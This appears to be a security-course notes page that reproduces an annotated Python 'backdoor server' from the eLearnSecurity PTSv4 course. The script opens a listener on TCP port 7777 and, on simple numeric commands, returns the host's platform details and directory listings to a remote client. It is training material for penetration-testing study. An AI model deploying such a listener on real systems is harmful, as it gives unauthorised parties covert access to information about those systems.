T
T
TODO•SEC
Search…
BackdoorServer.py
Backdoor Server from Python section of PTSv4 (eLearnSecurity)
1
import socket, platform, os
2
3
# Listen on user provided IPv4 address
4
# SRV_ADDR = '' for it to use all available interfaces
5
# // Alternatively,
6
# SRV_ADDR = input('Type IP to run server on: ')
7
# but it would require user input
8
9
SRV_ADDR = ""
10
# Listen on statically defined port:
11
# SRV_PORT = 7777
12
# // Alternatively,
13
# SRV_PORT = int(input('Type port/TCP to listen on: '))
14
# but it would require user input
15
16
SRV_PORT = 7777
17
18
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
19
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
20
# bind function assigns user provided IP address and port to the socket
21
s.bind((SRV_ADDR, SRV_PORT))
22
# listen for incoming connections
23
s.listen(1)
24
# To accept a connection the socket must be bound to an address and
25
# listening for connections.
26
# The return value is a pair (conn, address) where conn is
27
# a new socket object usable to send and receive data
28
# on the connection, and address is the address bound to the socket
29
# on the other end of the connection.
30
connection, address = s.accept()
31
print('Client connected with address:', address)
32
# While loop occurs as long as there is 1 connection made
33
while 1:
34
try:
35
data = connection.recv(1024)
36
except:continue
37
# If data received from client decodes to "1" in utf-8
38
# make a variable with the output of the
39
# platform and machine functions of the platform module
40
if(data.decode('utf-8') == '1'):
41
tosend = platform.platform() + "" + platform.machine()
42
connection.sendall(tosend.encode())
43
# If data received from client decodes to "2" in utf-8
44
# make a variable with the output of the
45
# listdir function of the os module and encode it in utf-8
46
elif(data.decode('utf-8') == '2'):
47
data = connection.recv(1024)
48
try:
49
filelist = os.listdir(data.decode('utf-8'))
50
tosend = ""
51
for x in filelist:
52
tosend += "," + x
53
# If the path doesn't exist assign the string "Wrong Path"
54
# to the tosend variable and encode
55
except:
56
tosend = "Wrong path"
57
connection.sendall(tosend.encode())
58
# If data received from client decodes to "0" in utf-8
59
# close the connection
60
elif(data.decode('utf-8') == '0'):
61
connection.close()
62
# Connection socket object and the address of the
63
# client establishing the connection are passed on
64
# to the accept function on that connection/address tuple
65
# so that connection is accepted?
66
connection, address = s.accept()
Copied!
Last modified 8d ago
Copy link